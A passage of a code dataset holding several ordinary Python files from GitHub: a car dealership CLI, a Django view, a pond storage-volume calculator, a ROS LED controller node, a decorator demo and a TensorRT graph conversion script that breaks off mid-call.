input(\"Enter the car's new color: \")\n novo_tipo = input(\"Enter the motor's new type: \")\n nova_potencia = input(\"Enter the motor's new power: \")\n novos_cavalos = input(\"Enter the motor's new horsepower: \")\n novo_combustivel = input(\"Enter the motor's new fuel type: \")\n\n # Atualizando as informações do carro\n car.modelo = novo_modelo if novo_modelo else car.modelo\n car.ano = int(novo_ano) if novo_ano else car.ano\n car.preco = float(novo_preco) if novo_preco else car.preco\n car.cor = nova_cor if nova_cor else car.cor\n car.motor.tipo = novo_tipo if novo_tipo else car.motor.tipo\n car.motor.potencia = int(nova_potencia) if nova_potencia else car.motor.potencia\n car.motor.cavalos = int(novos_cavalos) if novos_cavalos else car.motor.cavalos\n car.motor.combustivel = novo_combustivel if novo_combustivel else car.motor.combustivel\n\n # Chamando o método update da classe CarCRUD para atualizar o carro no banco de dados\n self.car_crud.update(marca, modelo, car) # Passar a marca e o modelo originais junto com o carro atualizado\n print(\"Car updated successfully.\")\n else:\n print(\"Car not found - CLI.\")\n\n # Método para deletar um carro\n def delete_car(self):\n # Solicitando a marca e o modelo do carro ao usuário\n marca = input(\"Enter the car's brand: \")\n modelo = input(\"Enter the car's model: \")\n # Chamando o método read da classe CarCRUD para encontrar o carro\n car = self.car_crud.read(marca, modelo)\n \n if car:\n # Chamando o método delete da classe CarCRUD para deletar o carro do banco de dados\n self.car_crud.delete(car.marca, car.modelo)\n print(\"Car deleted successfully.\")\n else:\n print(\"Car not found.\")\n\n # Método para executar a interface de linha de comando específica para carros\n def run(self):\n print(\"Welcome to Mr. Dito's Dealership - Administrator Panel\")\n print(\"To proceed, please enter a command:\")\n print(\"create, read, update, delete, quit\")\n super().run()","repo_name":"AlvaroLucioRibeiro/Final_Project_S202_2023","sub_path":"carCLI.py","file_name":"carCLI.py","file_ext":"py","file_size_in_byte":5735,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"682733860","text":"from django.shortcuts import render, redirect\nfrom person.models import About, Partner, Resume, Project\nfrom posts.models import Post\nfrom .forms import GetInTouchForm\nfrom .models import Service\n\n# Create your views here.\n\n\ndef home_view(request):\n obj = About.objects.order_by('-id')[:1]\n partner = Partner.objects.all()\n post = Post.objects.order_by('-id')\n form = GetInTouchForm(request.POST or None)\n q = request.GET.get('search')\n if q:\n post = post.filter(title__icontains=q)\n cat = request.GET.get('cat')\n if cat:\n post = post.filter(category__category__exact=cat)\n tag = request.GET.get('tag')\n if tag:\n post = post.filter(tag__tag__exact=tag)\n if form.is_valid():\n form.save()\n resume = Resume.objects.all()\n serves = Service.objects.all()\n projects = Project.objects.all()\n ctx = {\n 'objects': obj,\n 'partners': partner,\n 'posts': post,\n 'form': form,\n 'resume': resume,\n 'services': serves,\n 'projects': projects\n }\n return render(request, 'index.html', ctx)\n","repo_name":"Prince12Alimardon/Resume-site","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4015525502","text":"'''\r\n\r\nstage_depth is a local reference depth within an object\r\n\t-> all calc's are performed using this property\r\n\r\nelevation is an absolute reference between objects\r\n\t-> stage_depth is computed from elevation by subtracting start_stage_elevation\r\n\t-> all output is translated from stage_depth to elevation\r\n\t-> this is the primary io between the SSD object and all child objects\r\n\r\n'''\r\nimport math\r\nfrom sympy.solvers import solve\r\nfrom sympy import integrate, log, exp, oo, symbols\r\n\r\nimport Base\r\n\r\nif __name__ == '_ _main__':\r\n\tderivation_string = '''\r\n\t***** Storage Volume Derivation ******\r\n\r\n\tVolume = Integral(Length * Width, from=0, to=Height, WRT=Height)\r\n\t\twhere Length = bottom_length + Height * Slopes * 2\r\n\t'''\r\n\tprint(derivation_string)\r\n\t# Assumes Slope is uniform around the pond/vault:\r\n\tx,y,z,Slope = symbols(('x','y','z','Slope'))\r\n\r\n\tvolume = integrate((x + 2 * (Slope * z)) * (y + 2 * (Slope * z)),(z, 0, z))\r\n\r\n\tprint('Uniform side slopes: x = {0}, y = {1}, z = {2}, Slopes = {3}:1'.format(10,20,5,3))\r\n\tprint('Pond Volume =',volume, '\\nPond Volume =', volume.evalf(subs={x:10, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ty:20, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tz:5, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tSlope:3}) / 43560)\r\n\tprint()\r\n\r\n\t# Generalized form, all slopes are independent:\r\n\tx,y,z,slope_x_1, slope_x_2, slope_y_1, slope_y_2 = symbols(\r\n\t\t('x','y','z','slope_x_1',' slope_x_2',' slope_y_1',' slope_y_2'))\r\n\r\n\tvolume = integrate( (x + (slope_x_1 * z) + (slope_x_2 * z)) * \r\n\t\t\t\t\t\t(y + (slope_y_1 * z) + (slope_y_2 * z)),\r\n\t\t\t\t\t\t(z, 0, z))\r\n\tprint('Unique side slopes')\r\n\tprint('Pond Volume =',volume, '\\nPond Volume =', volume.evalf(subs={x:10, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ty:20, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tz:5, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tslope_x_1:3, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tslope_x_2:3, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tslope_y_1:3, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tslope_y_2:3}) / 43560)\r\n\tprint()\t\t\t\t\t\t\t\t\t \r\n\r\n\r\n\t\t\r\n\t# Generalized form, all slopes are independent, length is a function of width:\r\n\tx,y,z,slope_x_1, slope_x_2, slope_y_1, slope_y_2, volume, len_to_width = symbols(\r\n\t\t('x','y','z','slope_x_1',' slope_x_2',' slope_y_1',' slope_y_2', 'volume', 'len_to_width'))\r\n\r\n\r\n\t# x == length\r\n\t# y == width\r\n\t# y = len_to_width * x\r\n\ty = x / len_to_width\r\n\r\n\t# Solve for width given a depth, volume, and side slopes (output is mostly usable because quadratic roots):\r\n\tanswer = solve(\tx*y*z + \r\n\t\t\tz**3*( slope_x_1*slope_y_1/3 + \r\n\t\t\t\t\tslope_x_1*slope_y_2/3 + \r\n\t\t\t\t\tslope_x_2*slope_y_1/3 + \r\n\t\t\t\t\tslope_x_2*slope_y_2/3) +\r\n\t\t\tz**2*( slope_x_1*y/2 + \r\n\t\t\t\t\tslope_x_2*y/2 + \r\n\t\t\t\t\tslope_y_1*x/2 + \r\n\t\t\t\t\tslope_y_2*x/2) - volume, x)\r\n\r\n\tprint(30*'#', 5*'\\n', answer[0], 5*'\\n', 30*'#')\r\n\t'''\r\n\t# Solve for depth given a width, volume, and side slopes (output is not very usable due to cubic roots)\r\n\tanswer_z = solve(\tx*y*z + \r\n\t\t\tz**3*( slope_x_1*slope_y_1/3 + \r\n\t\t\t\t\tslope_x_1*slope_y_2/3 + \r\n\t\t\t\t\tslope_x_2*slope_y_1/3 + \r\n\t\t\t\t\tslope_x_2*slope_y_2/3) +\r\n\t\t\tz**2*( slope_x_1*y/2 + \r\n\t\t\t\t\tslope_x_2*y/2 + \r\n\t\t\t\t\tslope_y_1*x/2 + \r\n\t\t\t\t\tslope_y_2*x/2) - volume, z)\r\n\t'''\r\n\r\n\r\n\tprint(30*'#' + 5*'\\n')\r\n\t_slope = 0\r\n\tltw = 1\r\n\troot_1 = answer[0].subs({\t\tslope_x_1:_slope,\r\n\t\t\t\t\t\t\t\t\tslope_x_2:_slope,\r\n\t\t\t\t\t\t\t\t\tslope_y_1:_slope,\r\n\t\t\t\t\t\t\t\t\tslope_y_2:_slope,\r\n\t\t\t\t\t\t\t\t\tz:1,\r\n\t\t\t\t\t\t\t\t\tlen_to_width:ltw,\r\n\t\t\t\t\t\t\t\t\tvolume:3600,\r\n\t\t\t\t\t\t\t\t\t})\r\n\r\n\r\n\tprint(5*'\\n', answer[0])\r\n\r\n\tprint(root_1, root_1.evalf(), root_1.evalf() / ltw)\r\n\tprint(5*'\\n' + 30*'#')\r\n\r\n\r\nclass RDStorage(Base.RDObject):\r\n\tdef __init__(self, *args, **kwargs):\r\n\t\tsuper().__init__(*args, **kwargs)\r\n\r\n\r\n\tdef volume_at_stage(self, stage_depth):\r\n\t\traise(Exception('You must define the \".volume_at_stage\" method in the subclass directly.'))\r\n\r\n\tdef stage_depth_with_volume(self, volume, precision = 0.1):\r\n\t\t'''\r\n\t\tThis returns the stage_depth at which the input volume is achieved to a given accuracy (default == 1e-5)\r\n\r\n\t\tThe solution complexity is log(n) via the bisection method\r\n\r\n\t\tPrecedure:\r\n\t\t\t1. Define upper and lower bounds\r\n\t\t\t\tupper = max_stage\r\n\t\t\t\tlower = 0\r\n\t\t\t2. Test if between initial bounds \r\n\t\t\t\tIf greater than upper: upper = upper * 2; repeat 2.;\r\n\t\t\t\tIf less than lower and lower = 0: raise error; \t\t\texit;\r\n\t\t\t\tSet middle initially\r\n\t\t\t\r\n\t\t\t3. Check precision\r\n\t\t\t\tIf good: break loop;\t\t\t\t\t\t\t\t\texit;\r\n\t\t\t\tLimit iteration;\r\n\t\t\t4. Test if greater than middle\r\n\t\t\t\tIf greater: lower = middle\r\n\t\t\t\tif not greater: upper = middle\r\n\t\t\t5. Find middle (avg(upper, lower)); repeat 3.;\r\n\t\t\t6. return middle\r\n\r\n\t\t'''\r\n\t\t# 1.\r\n\t\tupper_stage = self.max_depth\r\n\t\tlower_stage = 0\t\t# By Definition: Volume == 0\r\n\r\n\t\t# 2.\r\n\t\twhile self.volume_at_stage(upper_stage) < volume:\r\n\t\t\tupper_stage = upper_stage * 2\r\n\r\n\t\tif volume < 0:\r\n\t\t\traise(Exception('\\nVolume must be greater than 0.\\n'))\r\n\t\t\r\n\r\n\t\tmiddle_stage = (upper_stage + lower_stage) / 2 \r\n\r\n\t\t# 3.\r\n\t\titr = 0\r\n\t\twhile abs(volume - self.volume_at_stage(middle_stage)) > precision and itr < 100:\r\n\t\t\titr += 1\r\n\t\t\t\r\n\t\t\t# 4.\r\n\t\t\tif volume > self.volume_at_stage(middle_stage):\r\n\t\t\t\tlower_stage = middle_stage\r\n\t\t\telse:\r\n\t\t\t\tupper_stage = middle_stage\r\n\t\t\t\r\n\t\t\t# 5.\r\n\t\t\tmiddle_stage = (upper_stage + lower_stage) / 2\t\r\n\t\t\t\t\r\n\t\t# 6.\r\n\t\treturn middle_stage\r\n\r\n\r\n\r\nclass Pond(RDStorage):\r\n\tdef __init__(self, bottom_length = 0, \r\n\t\t\t\t\t\tbottom_width = 0, \r\n\t\t\t\t\t\tdepth = None, \r\n\t\t\t\t\t\tslope_width_1 = 3, \r\n\t\t\t\t\t\tslope_width_2 = 3, \r\n\t\t\t\t\t\tslope_length_1 = 3, \r\n\t\t\t\t\t\tslope_length_2 = 3,\r\n\t\t\t\t\t\tslope = None,\r\n\t\t\t\t\t\televation = 0,\r\n\t\t\t\t\t\tlen_to_width = 1,\r\n\t\t\t\t\t\tvolume = None,\r\n\t\t\t\t\t\t):\r\n\t\tsuper().__init__(elevation_bottom = elevation)\r\n\r\n\t\tself.x = bottom_width\r\n\t\tself.y = bottom_length\r\n\t\tself.z = depth\r\n\t\tself.len_to_width = len_to_width\r\n\t\tprint(slope)\r\n\t\tif slope != None:\r\n\t\t\tself.slope_width_1 = slope\r\n\t\t\tself.slope_width_2 = slope\r\n\t\t\tself.slope_length_1 = slope\r\n\t\t\tself.slope_length_2 = slope\r\n\t\telse:\r\n\t\t\tself.slope_width_1 = slope_width_1\r\n\t\t\tself.slope_width_2 = slope_width_2\r\n\t\t\tself.slope_length_1 = slope_length_1\r\n\t\t\tself.slope_length_2 = slope_length_2\r\n\t\t\r\n\t\tprint(self.slope_width_1)\r\n\t\tif volume and depth:\r\n\t\t\tself.set_len_and_width(volume = volume, depth = depth)\r\n\t\telse:\r\n\t\t\tself.volume_max = 0\r\n\r\n\t\tself.compute_max_volume()\r\n\t\r\n\tdef set_max_depth(self, depth):\r\n\t\tself.z = depth\r\n\r\n\t@property\r\n\tdef max_depth(self):\r\n\t\treturn self.z\r\n\r\n\tdef set_bottom_width(self, width):\r\n\t\tself.x = width\r\n\r\n\t@property\r\n\tdef bottom_width(self):\r\n\t\treturn self.x\r\n\r\n\tdef set_bottom_length(self, length):\r\n\t\tself.y = length\r\n\r\n\t@property\r\n\tdef bottom_length(self):\r\n\t\treturn self.y\r\n\t\r\n\tdef compute_max_volume(self):\r\n\t\tself.volume_max = self.volume_at_stage(self.max_depth)\r\n\t\r\n\tdef width_at_stage(self, stage_depth):\r\n\t\treturn self.bottom_width + (stage_depth * self.slope_width_1) + (stage_depth * self.slope_width_2)\r\n\t\r\n\tdef length_at_stage(self, stage_depth):\r\n\t\treturn self.bottom_length + (stage_depth * self.slope_length_1) + (stage_depth * self.slope_length_2)\r\n\t\r\n\tdef area_at_stage(self, stage_depth):\r\n\t\twidth = self.width_at_stage(stage_depth)\r\n\t\tlength = self.length_at_stage(stage_depth)\r\n\t\treturn length * width\r\n\t\t\r\n\tdef volume_at_stage(self, stage_depth):\r\n\t\t'''\r\n\t\t# # # # # # # # # # # # # # # # # # \r\n\t\t# Derivation of volume formula\r\n\t\t#\r\n\t\t\r\n\t\tfrom sympy import integrate, log, exp, oo, symbols\r\n\t\t\r\n\t\t# Generalized form, all slopes are independent:\r\n\t\tx,y,z,slope_x_1, slope_x_2, slope_y_1, slope_y_2 = symbols(\r\n\t\t\t('x','y','z','slope_x_1',' slope_x_2',' slope_y_1',' slope_y_2'))\r\n\t\t\r\n\t\tvolume = integrate( (x + (slope_x_1 * z) + (slope_x_2 * z)) * \r\n\t\t\t\t\t\t\t(y + (slope_y_1 * z) + (slope_y_2 * z)),\r\n\t\t\t\t\t\t\t(z, 0, z))\r\n\t\t\r\n\t\t# This is the output required for the class method below:\r\n\t\tprint(volume)\r\n\t\t\r\n\t \r\n\t\t\r\n\t\tprint(volume, '\\n', volume.evalf(subs={ x:10, \r\n\t\t\t\t\t\t\t\t\t\t\t\ty:20, \r\n\t\t\t\t\t\t\t\t\t\t\t\tz:5, \r\n\t\t\t\t\t\t\t\t\t\t\t\tslope_x_1:3, \r\n\t\t\t\t\t\t\t\t\t\t\t\tslope_x_2:3, \r\n\t\t\t\t\t\t\t\t\t\t\t\tslope_y_1:3, \r\n\t\t\t\t\t\t\t\t\t\t\t\tslope_y_2:3}) / 43560)\r\n\r\n\t\t'''\r\n\t\tx = self.bottom_width\r\n\t\ty = self.bottom_length\r\n\t\tz = stage_depth\r\n\t\tslope_x_1 = self.slope_width_1\r\n\t\tslope_x_2 = self.slope_width_2\r\n\t\tslope_y_1 = self.slope_length_1\r\n\t\tslope_y_2 = self.slope_length_2\r\n\t\t\r\n\t\treturn (\tx*y*z + \r\n\t\t\t\t\tz**3*( slope_x_1*slope_y_1/3 + \r\n\t\t\t\t\t\t\tslope_x_1*slope_y_2/3 + \r\n\t\t\t\t\t\t\tslope_x_2*slope_y_1/3 + \r\n\t\t\t\t\t\t\tslope_x_2*slope_y_2/3) +\r\n\t\t\t\t\tz**2*( slope_x_1*y/2 + \r\n\t\t\t\t\t\t\tslope_x_2*y/2 + \r\n\t\t\t\t\t\t\tslope_y_1*x/2 + \r\n\t\t\t\t\t\t\tslope_y_2*x/2)\r\n\t\t\t\t)\r\n\t\r\n\r\n\t@property\r\n\tdef elevation_at_max_stage(self):\r\n\t\treturn self.start_stage_elevation + self.max_depth\r\n\r\n\tdef length_at_elevation(self, elevation):\r\n\t\tstage_depth = elevation - self.start_stage_elevation\r\n\t\tif stage_depth >= 0:\r\n\t\t\treturn self.length_at_stage(stage_depth)\r\n\t\telse:\r\n\t\t\treturn 0\r\n\r\n\tdef width_at_elevation(self, elevation):\r\n\t\tstage_depth = elevation - self.start_stage_elevation\r\n\t\tif stage_depth >= 0:\r\n\t\t\treturn self.width_at_stage(stage_depth)\r\n\t\telse:\r\n\t\t\treturn 0\r\n\r\n\tdef volume_at_elevation(self, elevation):\r\n\t\tstage_depth = elevation - self.start_stage_elevation\r\n\t\tif stage_depth >= 0:\r\n\t\t\treturn self.volume_at_stage(stage_depth)\r\n\t\telse:\r\n\t\t\treturn 0\r\n\r\n\tdef set_len_and_width(self, volume = None, depth = None):\r\n\t\tlen_to_width = self.len_to_width\r\n\t\t\r\n\t\tif depth:\r\n\t\t\tz = depth\r\n\t\telse:\r\n\t\t\tz = self.max_depth\r\n\r\n\t\tif volume:\r\n\t\t\tvolume = volume\r\n\t\telse:\r\n\t\t\tvolume = self.volume_max\r\n\t\t\r\n\r\n\t\tslope_x_1 = self.slope_width_1\r\n\t\tslope_x_2 = self.slope_width_2\r\n\t\tslope_y_1 = self.slope_length_1\r\n\t\tslope_y_2 = self.slope_length_2\r\n\t\tlength =\t( -3 * z**2 * (len_to_width*slope_y_1 + len_to_width*slope_y_2 + slope_x_1 + slope_x_2) +\r\n\t\t\t\t\t \tmath.sqrt(3) *\r\n\t\t\t\t\t \tmath.sqrt( z * (\t3 *len_to_width**2*slope_y_1**2*z**3 + \r\n\t\t\t\t\t\t\t\t\t\t\t6 *len_to_width**2*slope_y_1*slope_y_2*z**3 + \r\n\t\t\t\t\t\t\t\t\t\t\t3 *len_to_width**2*slope_y_2**2*z**3 - \r\n\t\t\t\t\t\t\t\t\t\t\t10*len_to_width*slope_x_1*slope_y_1*z**3 - \r\n\t\t\t\t\t\t\t\t\t\t\t10*len_to_width*slope_x_1*slope_y_2*z**3 - \r\n\t\t\t\t\t\t\t\t\t\t\t10*len_to_width*slope_x_2*slope_y_1*z**3 - \r\n\t\t\t\t\t\t\t\t\t\t\t10*len_to_width*slope_x_2*slope_y_2*z**3 + \r\n\t\t\t\t\t\t\t\t\t\t\t48*len_to_width*volume + \r\n\t\t\t\t\t\t\t\t\t\t\t3*slope_x_1**2*z**3 + \r\n\t\t\t\t\t\t\t\t\t\t\t6*slope_x_1*slope_x_2*z**3 + \r\n\t\t\t\t\t\t\t\t\t\t\t3*slope_x_2**2*z**3)\r\n\t\t\t\t\t \t)\r\n\t\t\t\t\t) / (12*z) \r\n\t\twidth = length / self.len_to_width\r\n\r\n\t\tself.set_bottom_length(length)\r\n\t\tself.set_bottom_width(width)\r\n\t\tself.set_max_depth(depth)\r\n\t\tself.compute_max_volume()\r\n\r\n\t\r\n\r\n\t\t\r\n\r\n\r\nclass Pipe(RDStorage, Base.RDCircle):\r\n\tdef __init__(\tself, \r\n\t\t\t\t\televation, \t\t\t\t# Feet\r\n\t\t\t\t\tdiameter, \t\t\t\t# Feet\r\n\t\t\t\t\tlength, \t\t\t\t# Feet\r\n\t\t\t\t\tvoid_ratio = 0.33,\t\t# unitless, typically 0.33 for Perf. CMP systems, 0.00 for non-Perf. CMP\r\n\t\t\t\t\tperforated = True):\t\t\r\n\t\tsuper().__init__(elevation_bottom = elevation, diameter_ft = diameter)\r\n\t\tself.length = length\r\n\t\tself.perforated = perforated\r\n\t\tself.void_ratio_ag = void_ratio\r\n\t\tself.set_void_ratio_ag(void_ratio)\r\n\r\n\t\t\r\n\r\n\tdef set_void_ratio_ag(self, void_ratio):\r\n\t\tif not self.perforated:\r\n\t\t\tself.void_ratio_ag = 0\r\n\t\telse:\r\n\t\t\tself.void_ratio_ag = void_ratio\r\n\r\n\tdef volume_at_stage(self, stage_depth):\r\n\t\tpass\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\t\r\n\tpipe1 = Pipe(0, 1, 120)\r\n\r\n\r\n\t# Crude SSD output:\r\n\tp1 = Pond(143.26, 286.52, 10, 2,2,2,2)\r\n\t# p4 = Pond(len_to_width = 130/95,\r\n\t# \t\t\tdepth = 6,\r\n\t# \t\t\tslope = 3,\r\n\t# \t\t\tvolume = 100992)\r\n\t# p1 = p4\r\n\tinc = 10/90\r\n\tprint('Stage\\t', 'Area\\t', 'Volume\\t', 'Discharge')\r\n\tfor i in range(0, 93):\r\n\t\tstage = i * inc\r\n\t\tprint(round(stage, 3), '\\t', int(p1.area_at_stage(stage)) , '\\t', round(p1.volume_at_stage(stage)/43560, 4))\r\n\t\t\t\t\t\r\n\t\r\n\tp2 = Pond(\r\n\t\tbottom_length = 130, \r\n\t\tbottom_width = 55, \r\n\t\tdepth = 6, \r\n\t\tslope = 3)\r\n\t\r\n\tprint('Bottom area:', p2.area_at_stage(0), '\\nVolume at Riser Head:', p2.volume_at_stage(p2.z), 'cu ft',p2.volume_at_stage(p2.z)/ 43560)\t\r\n\t\t\t\t\t\r\n\t\t\t\t\t\r\n\t\t\t\t\t\r\n\r\n\tp3 = Pond(\r\n\t\tbottom_length = 130, \r\n\t\tbottom_width = 95, \r\n\t\tdepth = 6, \r\n\t\tslope = 3)\r\n\t\r\n\tprint('Bottom area:', p3.area_at_stage(0), '\\nVolume at Riser Head:', p3.volume_at_stage(p3.z), 'cu ft',p3.volume_at_stage(p3.z)/ 43560)\t\r\n\t\t\t\t\t\r\n\r\n\tp4 = Pond(len_to_width = 130/95,\r\n\t\t\t\tdepth = 6,\r\n\t\t\t\tslope = 3,\r\n\t\t\t\tvolume = 100992)\r\n\t\t\t\t\t\r\n\tprint('Bottom area:', p4.area_at_stage(0), '\\nVolume at Riser Head:', p4.volume_at_stage(p4.z), 'cu ft',p4.volume_at_stage(p4.z)/ 43560)\t\r\n\t\t\t\t\t\r\n\t\t\t\t\t\r\n\tp5 = Pond(len_to_width = 1, depth = 6, volume = 10000, slope = 0)\r\n\tprint(p5.stage_depth_with_volume(10001))\r\n\t\t\t\t\t\r\n\t\t\t\t\t","repo_name":"E-419/RainDrain","sub_path":"src/Storage.py","file_name":"Storage.py","file_ext":"py","file_size_in_byte":12278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2764503407","text":"#!/usr/bin/env python\n\n# Core ROS libs\nimport rospy\n\n# Controller lib\nfrom PCA9530_pkg.PCA9530_lib import PCA9530\n\n# Import ROS standard messages.\nfrom std_msgs.msg import String\n\n# JSON tool\nimport json\n\n# IMPORTANT #\n# See the node's README file for further details on what parameters the node expects.\n\n# Callback used to translate the received JSON message to an LED controller command.\n# Expecting something like this (example for the LED0 on command):\n# {\n# \"action\" : \"command\",\n# \"parameters\" : {\n# \"id\" : \"LED0\",\n# \"command\" : \"on\"\n# }\n# }\ndef messageCallback(message):\n try:\n # Unpack JSON message\n data = json.loads(message.data)\n \n # Execute the given action with its parameters.\n action = data['action']\n if action == \"command\":\n parameters = data['parameters']\n command(parameters['id'], parameters['command'])\n elif action == \"config\":\n parameters = data['parameters']\n command(parameters['id'], parameters['config'], parameters['value'])\n else:\n rospy.logerr(rospy.get_caller_id() + \": Unrecognized action \\\"%s\\\"\" % (action))\n except ValueError as e:\n rospy.logerr(rospy.get_caller_id() + \": Error decoding JSON \\\"%s\\\"\" % (str(e)))\n\n# Issue a command to the LED controller.\ndef command(id, command):\n if id == \"LED0\":\n ledID = PCA9530.LED0\n elif id == \"LED1\":\n ledID = PCA9530.LED1\n elif id == \"BOTH\":\n ledID = PCA9530.LED_BOTH\n else:\n rospy.logwarn(rospy.get_caller_id() + \" Unrecognized LED identifier \\\"%s\\\"\" % (id))\n return\n\n if command == \"on\":\n rospy.loginfo(rospy.get_caller_id() + \": Issuing \\\"on\\\" command on %s\" % (id))\n _controller.ledOn(ledID)\n elif command == \"off\":\n rospy.loginfo(rospy.get_caller_id() + \": Issuing \\\"off\\\" command on %s\" % (id))\n _controller.ledOff(ledID)\n elif command == \"blink0\":\n rospy.loginfo(rospy.get_caller_id() + \": Issuing \\\"blink0\\\" command on %s\" % (id))\n _controller.ledBlink0(ledID)\n elif command == \"blink1\":\n rospy.loginfo(rospy.get_caller_id() + \": Issuing \\\"blink1\\\" command on %s\" % (id))\n _controller.ledBlink1(ledID)\n else:\n rospy.logwarn(rospy.get_caller_id() + \": Unsupported command \\\"%s\\\"\" % (command))\n return\n\n# Configure a parameter of the LED controller.\ndef config(id, config, value):\n if id == \"BLINK0\":\n blinkID = PCA9530.BLINK0\n elif id == \"BLINK1\":\n blinkID = PCA9530.BLINK1\n else:\n rospy.logwarn(rospy.get_caller_id() + \" Unrecognized BLINK identifier: \\\"%s\\\"\" % (id))\n return\n\n if config == \"duty-cycle\":\n rospy.loginfo(rospy.get_caller_id() + \": Configuring duty cycle for %s to %d\" % (id, value))\n _controller.setBlinkDutyCycle(blinkID, value)\n elif config.config == \"period\":\n rospy.loginfo(rospy.get_caller_id() + \": Configuring period for %s to %d\" % (id, value))\n _controller.setBlinkPeriod(blinkID, value)\n else:\n rospy.logwarn(rospy.get_caller_id() + \": Unsupported configuration \\\"%s\\\"\" % (config))\n return\n\n# Main node function.\nif __name__ == '__main__':\n _controller = PCA9530()\n _controller.open(1)\n\n rospy.init_node(\"led_controller_node\", anonymous=True)\n rospy.Subscriber(\"action\", String, messageCallback)\n\n rospy.spin()\n _controller.close()\n","repo_name":"hugbed/strabus-ros","sub_path":"led/led_controller/src/led_controller_node.py","file_name":"led_controller_node.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3686541190","text":"import functools\n\ndef decor(fun):\n @functools.wraps(fun)\n def wrapper(*args,**kwargs):\n c = 'number is : '\n c = c + fun(*args,**kwargs)\n return c\n return wrapper\n \n \n@decor \ndef one(a):\n if a == 'one':\n return '1'\n elif a == 'two':\n return '2'\n\n\nc = one('one')\n\nprint(c)\nprint(one.__name__)\nhelp(one)","repo_name":"prernaniraj/Python-Basics-Practice","sub_path":"decorator3.py","file_name":"decorator3.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74589677264","text":"import tensorflow as tf\nfrom PIL import Image\nimport numpy as np\n\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\nimport tensorflow.compat.v1 as tf1\n\ntf1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\nfrom tensorflow.python.compiler.tensorrt import trt_convert as trt\nimport argparse\nfrom tensorflow.python.util import deprecation\n\ndeprecation._PRINT_DEPRECATION_WARNINGS = False\n\nDEFAULT_FROZEN_GRAPH_NAME = \"frozen_inference_graph.pb\"\nDEFAULT_MAX_BATCHSIZE = 1\nDEFAULT_INPUT_NAME = \"image_tensor\"\nDEFAULT_BOXES_NAME = \"detection_boxes\"\nDEFAULT_CLASSES_NAME = \"detection_classes\"\nDEFAULT_SCORES_NAME = \"detection_scores\"\nDEFAULT_NUM_DETECTIONS_NAME = \"num_detections\"\nDEFAULT_PRECISION = \"FP32\"\nDEFAULT_NMS = False\n# Default workspace size : 512MB\nDEFAULT_MAX_WORKSPACE_SIZE = 1 << 29\nDEFAULT_MIN_SEGMENT_SIZE = 10\nDEFAULT_GPU_MEMORY_FRACTION = 0.6\n\nTfConfig = tf.ConfigProto()\n# TfConfig.gpu_options.allow_growth=True\nTfConfig.gpu_options.allow_growth = False\nTfConfig.gpu_options.per_process_gpu_memory_fraction = DEFAULT_GPU_MEMORY_FRACTION\n\n\ndef loadGraphDef(modelFile):\n graphDef = tf.GraphDef()\n with open(modelFile, \"rb\") as f:\n graphDef.ParseFromString(f.read())\n return graphDef\n\n\ndef saveGraphDef(graphDef, outputFilePath):\n with open(outputFilePath, \"wb\") as f:\n f.write(graphDef.SerializeToString())\n print(\"---------saved graphdef to {}\".format(outputFilePath))\n\n\ndef updateNmsCpu(graphDef):\n for node in graphDef.node:\n # if 'NonMaxSuppressionV' in node.name and not node.device:\n if \"NonMaxSuppression\" in node.name and \"TRTEngineOp\" not in node.name:\n # node.device = '/device:CPU:0'\n node.device = \"/job:localhost/replica:0/task:0/device:CPU:0\"\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Offline tf-trt GraphDef\")\n parser.add_argument(\n \"--modelPath\",\n type=str,\n default=DEFAULT_FROZEN_GRAPH_NAME,\n help=\"path to frozen model\",\n required=True,\n )\n parser.add_argument(\n \"--gpu_mem_fraction\",\n type=float,\n default=DEFAULT_GPU_MEMORY_FRACTION,\n help=\"Tensorflow gpu memory fraction, suggested value [0.2, 0.6]\",\n )\n parser.add_argument(\n \"--nms\", type=bool, default=DEFAULT_NMS, help=\"to offload NMS operation to CPU\"\n ),\n parser.add_argument(\n \"--precision\", type=str, default=DEFAULT_PRECISION, help=\"Precision mode to use\"\n )\n parser.add_argument(\n \"--max_batch_size\",\n type=int,\n default=DEFAULT_MAX_BATCHSIZE,\n help=\"Specify max batch size\",\n )\n parser.add_argument(\n \"--save_graph\", type=str, default=None, help=\"TF-TRT optimized model file\"\n )\n parser.add_argument(\n \"--min_segment_size\",\n type=int,\n default=DEFAULT_MIN_SEGMENT_SIZE,\n help=\"the minimum number of nodes required for a subgraph to be replaced by TRTEngineOp\",\n )\n args = parser.parse_args()\n saveGraphPath = args.save_graph\n if not saveGraphPath:\n saveGraphPath = (\n \"frozen_tfrtr_\"\n + args.precision.lower()\n + \"_bs\"\n + str(args.max_batch_size)\n + \"_mss\"\n + str(args.min_segment_size)\n + \".pb\"\n )\n TfConfig.gpu_options.per_process_gpu_memory_fraction = args.gpu_mem_fraction\n outputNames = [\n DEFAULT_BOXES_NAME,\n DEFAULT_CLASSES_NAME,\n DEFAULT_SCORES_NAME,\n DEFAULT_NUM_DETECTIONS_NAME,\n ]\n nnGraphDef = loadGraphDef(args.modelPath)\n converter = trt.TrtGraphConverter(\n is_dynamic_op=True,\n 